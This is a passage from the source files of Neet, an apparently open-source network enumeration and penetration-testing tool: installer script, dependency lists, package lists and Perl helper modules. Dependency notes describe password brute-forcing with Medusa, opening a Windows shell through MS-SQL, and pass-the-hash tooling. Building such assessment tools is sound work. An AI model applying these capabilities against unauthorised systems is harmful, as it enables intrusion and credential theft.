fi 90 | if [ $MANIN -eq 0 ]; then 91 | # Force install 92 | path=/usr/share/man 93 | mkdir -p /usr/share/man/man1 94 | cp man/*.gz ${path}/man1/ 95 | [ $? -eq 0 ] && MANIN=1 && MANPATH=$path 96 | fi 97 | 98 | if [ $MANIN -eq 1 ]; then 99 | echo "Man pages have been installed into $MANPATH/man1" 100 | fi 101 | 102 | newVersion neet $VERSION 103 | # Ensure that the location information is up to date 104 | ${NEET}/bin/updateLocations 105 | 106 | chown -R root.root "$NEET" 107 | chmod -R go-w "$NEET" 108 | chmod -R +X "$NEET" 109 | chmod 755 ${NEET}/bin/* 110 | 111 | -------------------------------------------------------------------------------- /content/install/dependencies.conf: -------------------------------------------------------------------------------- 1 | # This file contains details of the dependencies needed to install 2 | # Neet. It is intended to be human readable, as well as 3 | # machine parseable, so that you can check the dependencies yourself 4 | # first, if you so wish. 5 | 6 | # Executables 7 | 8 | component: Nmap 9 | executable: nmap 10 | versioncommand: nmap --version 11 | download: http://nmap.org/download.html 12 | versionformat: \d+\.\d+\d+ 13 | likelypaths: /usr/local/bin:/usr/bin 14 | recommended: 5.0 15 | critical: 4.2 16 | 17 | # Will build this anyway 18 | #component: Amap 19 | #executable: amap 20 | #download: http://freeworld.thc.org/releases.php?s=4&q=&o= 21 | #versioncommand: amap | grep Hauser 22 | #versionformat: \d+\.\d+ 23 | #likelypaths: /usr/local/bin:/usr/bin 24 | #recommended: 5.2 25 | 26 | component: TCPTraceroute 27 | executable: tcptraceroute 28 | download: http://michael.toren.net/code/tcptraceroute/ 29 | likelypaths: /usr/local/bin:/usr/bin:/usr/sbin:/usr/local/sbin 30 | #versioncommand: tcptraceroute -v 31 | #versionformat: \d+\.\d+ 32 | #recommended: 1.5 33 | 34 | component: OpenVAS-LIBNASL 35 | executable: openvas-nasl 36 | download: http://www.openvas.org/index.html 37 | likelypaths: /usr/local/bin:/usr/bin 38 | #versioncommand: openvas-nasl -v 39 | #versionformat: \d+\.\d+\.\d+ 40 | #recommended: 2.0.2 41 | 42 | component: WGet 43 | executable: wget 44 | download: http://www.gnu.org/software/wget/ 45 | versioncommand: wget --version | grep Wget 46 | versionformat: \d+\.\d+[\.\d+]{0,2} 47 | likelypaths: /usr/bin:/usr/local/bin 48 | recommended: 1.11.4 49 | 50 | component: SSLScan 51 | executable: sslscan 52 | download: http://www.titania.co.uk 53 | versioncommand: sslscan --version 54 | versionformat: \d+\.\d+\.\d+ 55 | likelypaths: /usr/bin:/usr/local/bin 56 | recommended: 1.8.0 57 | 58 | component: Dig 59 | executable: dig 60 | versioncommand: dig -v 2>&1 61 | versionformat: \d+\.\d+\.\d+ 62 | likelypaths: /usr/bin:/usr/local/bin 63 | recommended: 9.5.1 64 | 65 | component: RPCClient 66 | executable: rpcclient 67 | download: http://www.samba.org/samba/ 68 | versioncommand: rpcclient -V 69 | versionformat: \d+\.\d+\.\d+ 70 | likelypaths: /usr/bin:/usr/local/bin 71 | recommended: 3.2.5 72 | 73 | component: Net 74 | executable: net 75 | download: http://www.samba.org/samba/ 76 | versioncommand: net -V 77 | versionformat: \d+\.\d+\.\d+ 78 | likelypaths: /usr/bin:/usr/local/bin 79 | recommended: 3.2.5 80 | 81 | component: Net-SNMP 82 | download: http://net-snmp.sourceforge.net/ 83 | executable: snmpwalk 84 | versioncommand: snmpwalk -V 2>&1 85 | versionformat: \d+\.\d+\.\d+[\.\d+]{0,} 86 | likelypaths: /usr/bin:/usr/local/bin 87 | recommended: 5.4.1 88 | 89 | component: Ruby 90 | download: http://www.ruby-lang.org/en/downloads/ 91 | executable: ruby 92 | versioncommand: ruby -v 93 | versionformat: \d+\.\d+\.\d+ 94 | likelypaths: /usr/bin:/usr/local/bin 95 | recommended: 1.8.7 96 | 97 | component: Java 98 | download: http://www.java.com/en/download/linux_manual.jsp 99 | executable: java 100 | likelypaths: /usr/bin:/usr/local/bin 101 | 102 | component: LDAP Tools 103 | download: http://www.openldap.org/ 104 | executable: ldapsearch 105 | likelypaths: /usr/bin:/usr/local/bin 106 | 107 | # CPAN MODULES 108 | 109 | component: Net-ARP 110 | perlmodule: Net::ARP 111 | 112 | component: DBD-Sybase 113 | perlmodule: DBD::Sybase 114 | 115 | component: NetAddr-IP 116 | perlmodule: NetAddr::IP 117 | critical: yes 118 | 119 | # Will build this anyway 120 | #component: Net-PcapUtils 121 | #perlmodule: Net::PcapUtils 122 | 123 | component: DBI 124 | perlmodule: DBI 125 | 126 | component: Net-RawIP 127 | perlmodule: Net::RawIP 128 | 129 | component: XML-Parser 130 | perlmodule: XML::Parser 131 | critical: yes 132 | 133 | component: Term-ReadKey 134 | perlmodule: Term::ReadKey 135 | critical: yes 136 | 137 | component: XML-Twig 138 | perlmodule: XML::Twig 139 | critical: yes 140 | 141 | component: Net-Pcap 142 | perlmodule: Net::Pcap 143 | 144 | component: IO-Socket-SSL 145 | perlmodule: IO::Socket::SSL 146 | 147 | component: NetPacket-Ethernet 148 | perlmodule: NetPacket::Ethernet 149 | 150 | component: DBD-SQLite 151 | perlmodule: DBD::SQLite 152 | 153 | -------------------------------------------------------------------------------- /content/install/githubVersion: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | # Takes a GitHub neet repo name, and returns the version information that's in the MASTER branch. 4 | 5 | use strict; 6 | 7 | my $repo=$ARGV[0]; 8 | my $testAgainst=$ARGV[1]; 9 | if (!$repo || (index($repo,"neet") != 0) ) { 10 | print STDERR "Usage: $0 []\n"; 11 | exit 1; 12 | } 13 | 14 | my $version; 15 | my $URI="https://api.github.com/repos/jonnyhightower/$repo/releases"; 16 | my @data=`wget "$URI" -q -O - 2>&1`; 17 | for my $line (@data){ 18 | next if (index($line,"tag_name\":")<0); 19 | $line =~ s/\r//g; 20 | $line =~ s/^[\s\S]+:\s+"(\d+\.\d+\.\d+)",[\s\S]+$/$1/; 21 | next if ($line !~ /^\d+\.\d+\.\d+$/); 22 | if ($testAgainst && ($testAgainst =~ /^\d+\.\d+\.\d+$/)){ 23 | my @latest=split "\\.", $line; 24 | my @installed=split "\\.", $testAgainst; 25 | my $updateAvailable=1; 26 | if ($latest[0] > $installed[0]){ 27 | $updateAvailable=1; 28 | } elsif ($latest[0] < $installed[0]){ 29 | $updateAvailable=0; 30 | } else { 31 | if ($latest[1] > $installed[1]){ 32 | $updateAvailable=1; 33 | } elsif ($latest[1] < $installed[1]){ 34 | $updateAvailable=0; 35 | } else { 36 | if ($latest[2] > $installed[2]){ 37 | $updateAvailable=1; 38 | } else { 39 | $updateAvailable=0; 40 | } 41 | } 42 | } 43 | 44 | if ($updateAvailable){ 45 | print "$line\n"; 46 | exit 0; 47 | } else { 48 | exit 0; 49 | } 50 | } else { 51 | print "$line\n"; 52 | exit 0; 53 | } 54 | } 55 | exit 1; 56 | 57 | -------------------------------------------------------------------------------- /content/install/locations: -------------------------------------------------------------------------------- 1 | nmap=/usr/bin/nmap 2 | tcptraceroute=/usr/local/bin/tcptraceroute 3 | openvas-nasl=/usr/local/bin/openvas-nasl 4 | medusa=/usr/bin/medusa 5 | wget=/usr/bin/wget 6 | sslscan=/usr/bin/sslscan 7 | dig=/usr/bin/dig 8 | rpcclient=/usr/bin/rpcclient 9 | net=/usr/bin/net 10 | snmpwalk=/usr/bin/snmpwalk 11 | ruby=/usr/bin/ruby 12 | java=/usr/bin/java 13 | ldapsearch=/usr/bin/ldapsearch 14 | -------------------------------------------------------------------------------- /content/install/messages.dat: -------------------------------------------------------------------------------- 1 | ::Nmap:critical 2 | Nmap is the core port-scanning engine and as such, it is a critical component. 3 | 4 | ::Nmap:recommended 5 | Nmap performs a number of important tasks, such as service identification and 6 | a number of vulnerability checks. It is important to have the latest version 7 | detection fingerprints and scripting engine in order to get the best out of 8 | Neet. 9 | 10 | ::TCPTraceroute:recommended 11 | TCPTraceroute is used by the topology scanning module. 12 | 13 | ::Amap:recommended 14 | Amap is used to identify services which the Nmap service identification module 15 | has failed to identify accurately. 16 | 17 | ::OpenVAS-LIBNASL:recommended 18 | OpenVAS NASL is an open-source project which forked from the Nessus 2 development 19 | when Nessus 3.x ceased to be open source. Whilst the Neet discovery engine is not 20 | intended to replace vulnerability scanners such as Nessus, it uses OpenVAS LIBNASL 21 | to determine the presence of serious vulnerabilities which Neet is capable of 22 | exploiting. 23 | 24 | ::Medusa:recommended 25 | Medusa is used for brute-force-guessing passwords for a number of authentication 26 | mechanisms, including MySQL, MSSQL, Windows and SSH. It has replaced THC Hydra, 27 | which was used in older versions of Neet but proved to be less reliable. 28 | 29 | ::Bannergrab:recommended 30 | Bannergrab is used to obtain banner information from remote services. The discovery 31 | engine compares this banner information with known signatures in order to determine 32 | which services are listening on open ports. 33 | 34 | ::Dig:recommended 35 | Dig is a powerful tool for investigating DNS. 36 | 37 | ::RPCClient:recommended 38 | RPCClient is a part of the Samba suite, and is a tool for executing client-side 39 | RPC functions. It is used extensively by the discovery engine to enumerate data 40 | from Windows and Samba servers. 41 | 42 | ::Net:recommended 43 | Net is a part of the Samba suite, and is used extensively by the discovery 44 | engine to interact with Windows and Samba servers. 45 | 46 | ::Net-SNMP:recommended 47 | Net-SNMP is used by the discovery engine to enumerate SNMP data from servers. 48 | The discovery engine will not be able to dump SNMP MIBs without this tool set. 49 | 50 | ::Ruby:recommended 51 | Ruby is a dynamic, open source programming language with a focus on simplicity 52 | and productivity. It is used by the Metasploit Framework, which is used by the 53 | exploitation module of the Pentest Power Console. 54 | 55 | ::Net-ARP:recommended 56 | Net::ARP is used by fwdetect to determine which interfaces will forward packets. It 57 | can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 58 | command-line tool will fetch the module and any of its dependencies for you directly 59 | from the CPAN if you have Internet access, or install it from your distribution's 60 | package repositories. 61 | 62 | ::Net-RawIP:recommended 63 | Net::RawIP is used by fwdetect to determine which interfaces will forward packets. It 64 | can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 65 | command-line tool will fetch the module and any of its dependencies for you directly 66 | from the CPAN if you have Internet access, or install it from your distribution's 67 | package repositories. 68 | 69 | ::DBD-Sybase:recommended 70 | DBD-Sybase is used by Neet to create a Windows shell when connected to MS-SQL databases. 71 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 72 | command-line tool will fetch the module and any of its dependencies for you directly 73 | from the CPAN if you have Internet access, or install it from your distribution's 74 | package repositories. 75 | 76 | ::DBI:recommended 77 | DBI is used by Neet to create a Windows shell when connected to MS-SQL databases. It 78 | is also used by the credential manager. 79 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 80 | command-line tool will fetch the module and any of its dependencies for you directly 81 | from the CPAN if you have Internet access, or install it from your distribution's 82 | package repositories. 83 | 84 | ::NetAddr-IP:critical 85 | NetAddr::IP is used by the discovery engine to determine which interface is 86 | appropriate to use to route to each target. It is also used to perform address range 87 | conversions. The discovery engine will not work without this core module. 88 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 89 | command-line tool will fetch the module and any of its dependencies for you directly 90 | from the CPAN if you have Internet access, or install it from your distribution's 91 | package repositories. 92 | 93 | ::Net-Pcap:recommended 94 | This module is required by the Net::PcapUtils module. 95 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 96 | command-line tool will fetch the module and any of its dependencies for you directly 97 | from the CPAN if you have Internet access, or install it from your distribution's 98 | package repositories. 99 | 100 | ::Net-PcapUtils:recommended 101 | This module is required by fwdetect to determine which interfaces will forward packets. 102 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 103 | command-line tool will fetch the module and any of its dependencies for you directly 104 | from the CPAN if you have Internet access. 105 | 106 | ::Term-ReadKey:critical 107 | This module is required to provide user interaction. 108 | 109 | ::XML-Parser:critical 110 | This module is required to parse the results of some test tools, including nmap. 111 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 112 | command-line tool will fetch the module and any of its dependencies for you directly 113 | from the CPAN if you have Internet access. 114 | 115 | ::XML-Twig:critical 116 | This module is require to parse the results of some test tools, including nmap. 117 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 118 | command-line tool will fetch the module and any of its dependencies for you directly 119 | from the CPAN if you have Internet access. 120 | 121 | ::IO-Socket-SSL:recommended 122 | This module is required for testing of some services which are accessed through SSL. 123 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 124 | command-line tool will fetch the module and any of its dependencies for you directly 125 | from the CPAN if you have Internet access, or install it from your distribution's 126 | package repositories. 127 | 128 | ::DBD-SQLite:recommended 129 | This module is required for the credential manager. If you don't have this module, 130 | you'll see some ugly output while running Neet, and the various modules will not be 131 | able to store and share credentials in a meaningful way. 132 | It can be downloaded and compiled from http://www.cpan.org. Alternatively, the cpan 133 | command-line tool will fetch the module and any of its dependencies for you directly 134 | from the CPAN if you have Internet access, or install it from your distribution's 135 | package repositories. 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /content/install/pkg/backtrack: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | 10 | libpcap0.8 11 | libpcap-dev 12 | libnet1-dev 13 | libnet-pcap-perl 14 | libglib2.0-dev 15 | libgnutls26 16 | libgnutls-dev 17 | libgpgme11-dev 18 | uuid-dev 19 | libopenvasnasl2 20 | libdbi-perl 21 | libdbd-sqlite3-perl 22 | libdbd-sybase-perl 23 | libx11-protocol-perl 24 | 25 | ldap-utils 26 | medusa 27 | ntpdate 28 | 29 | 30 | -------------------------------------------------------------------------------- /content/install/pkg/debian: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | libnet-rawip-perl 10 | libxml-parser-perl 11 | libxml-twig-perl 12 | 13 | smbclient 14 | nfs-common 15 | 16 | libssl-dev 17 | libglib2.0-dev 18 | libgnutls26 19 | libgnutls-dev 20 | libnet1-dev 21 | libpcap0.8 22 | libpcap-dev 23 | libnet-pcap-perl 24 | libnetpacket-perl 25 | libnet-write-perl 26 | libgpgme11-dev 27 | uuid-dev 28 | libdbi-perl 29 | libdbd-sqlite3-perl 30 | libdbd-sybase-perl 31 | libx11-protocol-perl 32 | libopenvasnasl2 33 | libopenvasnasl2-dev 34 | 35 | snmp 36 | sslscan 37 | nmap 38 | ruby 39 | ldap-utils 40 | medusa 41 | ntpdate 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /content/install/pkg/debian-8: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | make 5 | autoconf 6 | 7 | libnet-arp-perl 8 | libnet-ip-perl 9 | libnetaddr-ip-perl 10 | libterm-readkey-perl 11 | libnet-rawip-perl 12 | libxml-parser-perl 13 | libxml-twig-perl 14 | 15 | smbclient 16 | nfs-common 17 | 18 | python-dev 19 | libpopt0 20 | libpopt-dev 21 | libssh-dev 22 | libhiredis-dev 23 | libgcrypt20-dev 24 | libcurl3 25 | libcurl4-openssl-dev 26 | libssl-dev 27 | libglib2.0-dev 28 | libgnutls-deb0-28 29 | libgnutls28-dev 30 | libnet1-dev 31 | libpcap0.8 32 | libpcap-dev 33 | libnet-pcap-perl 34 | libnetpacket-perl 35 | libnet-write-perl 36 | libgpgme11-dev 37 | uuid-dev 38 | libdbi-perl 39 | libdbd-sqlite3-perl 40 | libdbd-sybase-perl 41 | libx11-protocol-perl 42 | 43 | tcptraceroute 44 | tcpdump 45 | 46 | snmp 47 | sslscan 48 | nmap 49 | ruby 50 | ldap-utils 51 | medusa 52 | ntpdate 53 | 54 | 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /content/install/pkg/kali: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | 10 | libssl-dev 11 | libglib2.0-dev 12 | libgnutls26 13 | libgnutls-dev 14 | libnet1-dev 15 | libpcap0.8 16 | libpcap-dev 17 | libnet-pcap-perl 18 | libgpgme11-dev 19 | uuid-dev 20 | libdbi-perl 21 | libdbd-sqlite3-perl 22 | libdbd-sybase-perl 23 | libx11-protocol-perl 24 | 25 | ldap-utils 26 | medusa 27 | winexe 28 | passing-the-hash 29 | ntpdate 30 | 31 | -------------------------------------------------------------------------------- /content/install/pkg/kali-1.0: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | 10 | libssl-dev 11 | libglib2.0-dev 12 | libgnutls26 13 | libgnutls-dev 14 | libnet1-dev 15 | libpcap0.8 16 | libpcap-dev 17 | libnet-pcap-perl 18 | libgpgme11-dev 19 | uuid-dev 20 | libdbi-perl 21 | libdbd-sqlite3-perl 22 | libdbd-sybase-perl 23 | libx11-protocol-perl 24 | 25 | ldap-utils 26 | medusa 27 | winexe 28 | passing-the-hash 29 | ntpdate 30 | 31 | -------------------------------------------------------------------------------- /content/install/pkg/kali-kali-rolling: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | make 5 | autoconf 6 | 7 | libnet-arp-perl 8 | libnet-ip-perl 9 | libnetaddr-ip-perl 10 | libterm-readkey-perl 11 | libnet-rawip-perl 12 | libxml-parser-perl 13 | libxml-twig-perl 14 | 15 | smbclient 16 | nfs-common 17 | 18 | python-dev 19 | libpopt0 20 | libpopt-dev 21 | libssh-dev 22 | libhiredis-dev 23 | libgcrypt20-dev 24 | libcurl3 25 | libcurl4-openssl-dev 26 | libssl-dev 27 | libglib2.0-dev 28 | libgnutlsxx28 29 | libgnutls28-dev 30 | libnet1-dev 31 | libpcap0.8 32 | libpcap-dev 33 | libnet-pcap-perl 34 | libnetpacket-perl 35 | libnet-write-perl 36 | libgpgme11-dev 37 | uuid-dev 38 | libdbi-perl 39 | libdbd-sqlite3-perl 40 | libdbd-sybase-perl 41 | libx11-protocol-perl 42 | 43 | tcptraceroute 44 | tcpdump 45 | 46 | snmp 47 | sslscan 48 | nmap 49 | ruby 50 | ldap-utils 51 | medusa 52 | ntpdate 53 | 54 | 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /content/install/pkg/linuxmint-17: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | make 5 | autoconf 6 | 7 | libnet-arp-perl 8 | libnet-ip-perl 9 | libnetaddr-ip-perl 10 | libterm-readkey-perl 11 | libnet-rawip-perl 12 | libxml-parser-perl 13 | libxml-twig-perl 14 | 15 | smbclient 16 | nfs-common 17 | 18 | libpopt0 19 | libpopt-dev 20 | libssh-dev 21 | libhiredis-dev 22 | libgcrypt20-dev 23 | 24 | 25 | libssl-dev 26 | libglib2.0-dev 27 | libgnutls26 28 | libgnutls-dev 29 | libnet1-dev 30 | libpcap0.8 31 | libpcap-dev 32 | libnet-pcap-perl 33 | libnetpacket-perl 34 | libnet-write-perl 35 | libgpgme11-dev 36 | uuid-dev 37 | libdbi-perl 38 | libdbd-sqlite3-perl 39 | libdbd-sybase-perl 40 | libx11-protocol-perl 41 | libopenvasnasl2 42 | libopenvasnasl2-dev 43 | libcurl4-openssl-dev 44 | 45 | tcptraceroute 46 | tcpdump 47 | 48 | snmp 49 | sslscan 50 | nmap 51 | ruby 52 | ldap-utils 53 | medusa 54 | ntpdate 55 | -------------------------------------------------------------------------------- /content/install/pkg/linuxmint-17.1: -------------------------------------------------------------------------------- 1 | linuxmint-17 -------------------------------------------------------------------------------- /content/install/pkg/linuxmint-17.2: -------------------------------------------------------------------------------- 1 | linuxmint-17 -------------------------------------------------------------------------------- /content/install/pkg/linuxmint-17.3: -------------------------------------------------------------------------------- 1 | linuxmint-17 -------------------------------------------------------------------------------- /content/install/pkg/linuxmint-18: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | make 5 | autoconf 6 | 7 | libnet-arp-perl 8 | libnet-ip-perl 9 | libnetaddr-ip-perl 10 | libterm-readkey-perl 11 | libnet-rawip-perl 12 | libxml-parser-perl 13 | libxml-twig-perl 14 | 15 | smbclient 16 | nfs-common 17 | 18 | libpopt0 19 | libpopt-dev 20 | libssh-dev 21 | libhiredis-dev 22 | libgcrypt20-dev 23 | 24 | libssl-dev 25 | libglib2.0-dev 26 | libgnutls26 27 | libgnutls-dev 28 | libnet1-dev 29 | libpcap0.8 30 | libpcap-dev 31 | libnet-pcap-perl 32 | libnetpacket-perl 33 | libnet-write-perl 34 | libgpgme11-dev 35 | uuid-dev 36 | libdbi-perl 37 | libdbd-sqlite3-perl 38 | libdbd-sybase-perl 39 | libx11-protocol-perl 40 | libcurl4-openssl-dev 41 | 42 | tcptraceroute 43 | tcpdump 44 | 45 | snmp 46 | sslscan 47 | nmap 48 | ruby 49 | ldap-utils 50 | medusa 51 | ntpdate 52 | -------------------------------------------------------------------------------- /content/install/pkg/ubuntu-12.04: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | libnet-rawip-perl 10 | libxml-parser-perl 11 | libxml-twig-perl 12 | 13 | smbclient 14 | nfs-common 15 | 16 | libssl-dev 17 | libglib2.0-dev 18 | libgnutls26 19 | libgnutls-dev 20 | libnet1-dev 21 | libpcap0.8 22 | libpcap-dev 23 | libnet-pcap-perl 24 | libnetpacket-perl 25 | libnet-write-perl 26 | libgpgme11-dev 27 | uuid-dev 28 | libdbi-perl 29 | libdbd-sqlite3-perl 30 | libdbd-sybase-perl 31 | libx11-protocol-perl 32 | libopenvasnasl2 33 | libopenvasnasl2-dev 34 | libcurl-dev 35 | 36 | snmp 37 | sslscan 38 | nmap 39 | ruby 40 | ldap-utils 41 | medusa 42 | ntpdate 43 | 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /content/install/pkg/ubuntu-14.04: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | libnet-rawip-perl 10 | libxml-parser-perl 11 | libxml-twig-perl 12 | 13 | smbclient 14 | nfs-common 15 | 16 | libssl-dev 17 | libglib2.0-dev 18 | libgnutls26 19 | libgnutls-dev 20 | libnet1-dev 21 | libpcap0.8 22 | libpcap-dev 23 | libnet-pcap-perl 24 | libnetpacket-perl 25 | libnet-write-perl 26 | libgpgme11-dev 27 | uuid-dev 28 | libdbi-perl 29 | libdbd-sqlite3-perl 30 | libdbd-sybase-perl 31 | libx11-protocol-perl 32 | libopenvasnasl2 33 | libopenvasnasl2-dev 34 | libcurl-dev 35 | 36 | snmp 37 | sslscan 38 | nmap 39 | ruby 40 | ldap-utils 41 | medusa 42 | ntpdate 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /content/install/pkg/ubuntu-16.04: -------------------------------------------------------------------------------- 1 | cmake 2 | flex 3 | bison 4 | 5 | libnet-arp-perl 6 | libnet-ip-perl 7 | libnetaddr-ip-perl 8 | libterm-readkey-perl 9 | libnet-rawip-perl 10 | libxml-parser-perl 11 | libxml-twig-perl 12 | 13 | smbclient 14 | nfs-common 15 | 16 | libssl-dev 17 | libglib2.0-dev 18 | libgnutls26 19 | libgnutls-dev 20 | libnet1-dev 21 | libpcap0.8 22 | libpcap-dev 23 | libnet-pcap-perl 24 | libnetpacket-perl 25 | libnet-write-perl 26 | libgpgme11-dev 27 | uuid-dev 28 | libdbi-perl 29 | libdbd-sqlite3-perl 30 | libdbd-sybase-perl 31 | libx11-protocol-perl 32 | libcurl-dev 33 | 34 | snmp 35 | sslscan 36 | nmap 37 | ruby 38 | ldap-utils 39 | medusa 40 | ntpdate 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /content/main/JR/Files/Config.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | package Config; 24 | use Fcntl ':flock'; 25 | 26 | # Config file parsing for Neet 27 | # Jonathan Roach 28 | # April 2006 29 | # Version 30 | 31 | sub new { 32 | my $self=shift; 33 | my $file=shift(); 34 | my @contents; 35 | my %Config; 36 | my $F; 37 | if ($file && -f "$file" && open($F,"$file")){ 38 | until (eof $F){ 39 | my $line=readline (*$F); 40 | next if (($line !~ /\S/) || ($line =~ /^[\s]{0,}\#/)); 41 | chomp $line; 42 | push @contents,$line 43 | } 44 | close $F; 45 | } else { 46 | return 0; 47 | } 48 | $Config{'File'}=$file; 49 | $Config{'Contents'}=\@contents; 50 | 51 | my $object=\%Config; 52 | bless $object, $self; 53 | return $object; 54 | } 55 | 56 | sub Split { 57 | my $self=shift(); 58 | my $line=shift(); 59 | return 0 if (!$line || $line !~ /=/); 60 | my $sp=index($line,"="); 61 | my $key=substr($line,0,$sp); 62 | my $value=substr($line,$sp+1,length($line)-($sp+1)); 63 | return ($key,$value); 64 | } 65 | 66 | sub ListKeys { 67 | my $self=shift(); 68 | my @keys; 69 | for my $line (@{$$self{'Contents'}}){ 70 | my ($k,$v)=$self->Split($line); 71 | push @keys, $k; 72 | } 73 | return @keys; 74 | } 75 | 76 | sub GetVal { 77 | my $self=shift(); 78 | my $key=shift(); 79 | for my $line (@{$$self{'Contents'}}){ 80 | my ($k,$v)=$self->Split($line); 81 | if ("$k" eq "$key"){ 82 | return $v; 83 | } 84 | } 85 | return undef; 86 | } 87 | 88 | sub GetClassValues { 89 | my $self=shift(); 90 | my $class=shift(); 91 | my @values; 92 | for my $line (@{$$self{'Contents'}}){ 93 | my ($k,$v)=$self->Split($line); 94 | if ($k =~ /^$class/){ 95 | push @values, $v; 96 | } 97 | } 98 | return @values; 99 | } 100 | 101 | sub GetClassKeys { 102 | my $self=shift(); 103 | my $class=shift(); 104 | my @keys; 105 | for my $line (@{$$self{'Contents'}}){ 106 | my ($k,$v)=$self->Split($line); 107 | if ($k =~ /^$class/){ 108 | $k =~ s/$class//; 109 | push @keys, $k; 110 | } 111 | } 112 | return @keys; 113 | } 114 | 115 | sub UpdateValueInFile { 116 | my $self=shift(); 117 | my $class=shift(); 118 | my $value=shift(); 119 | my (@oldfile,@newfile,$changed); 120 | if (defined($class) && defined($value) && open(FH,$$self{'File'})){ 121 | flock(FH,LOCK_EX); 122 | @oldfile=; 123 | flock(FH,LOCK_UN); 124 | close FH; 125 | for my $line (@oldfile){ 126 | if ($line =~ /^${class}=/){ 127 | $line = "${class}=$value\n"; 128 | $changed=1; 129 | } 130 | push @newfile, $line; 131 | } 132 | $#oldfile=-1; 133 | 134 | if ($changed && open(FH,">$$self{'File'}")){ 135 | flock(FH,LOCK_EX); 136 | print FH @newfile; 137 | flock(FH,LOCK_UN); 138 | close FH; 139 | $#newfile=-1; 140 | return 1; 141 | } 142 | } 143 | return 0; 144 | } 145 | 146 | 1; 147 | -------------------------------------------------------------------------------- /content/main/JR/NetUtils/NetUtils.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # This is JR::NetUtils.pm 24 | 25 | sub isPortSpec { 26 | my $spec=shift(); 27 | return 1 if ($spec =~ /^\d+[-,]??\d+$/); 28 | return 0; 29 | } 30 | 31 | sub isIPSpec { 32 | my $spec=shift(); 33 | my $status=1; 34 | if ($spec !~ /\//){ 35 | # Absolute range 36 | my @octets=split "\\.", $spec; 37 | return 0 if ($#octets != 3); 38 | for my $octet (@octets){ 39 | my ($a,$b)=split("-",$octet); 40 | if ($b){ 41 | $status=0 if ($b !~ /^\d{1,3}$/); 42 | $status=0 if (($b > 255) || ($b <= $a)); 43 | } else { 44 | $status=0 if ($octet =~ /-/); 45 | } 46 | $status=0 if ($a !~ /^\d{1,3}$/); 47 | $status=0 if ($a > 255); 48 | } 49 | } else { 50 | # CIDR notation 51 | my ($net,$mask)=split "/", $spec; 52 | $status=is_ipspec($net); 53 | if ($status){ 54 | if (!is_ipspec($mask)){ 55 | if (!(($mask =~ /^\d+$/) && ($mask > 0) && ($mask < 33))){ 56 | $status=0; 57 | } 58 | } 59 | } 60 | } 61 | return $status; 62 | } 63 | 64 | sub isIPRange { 65 | 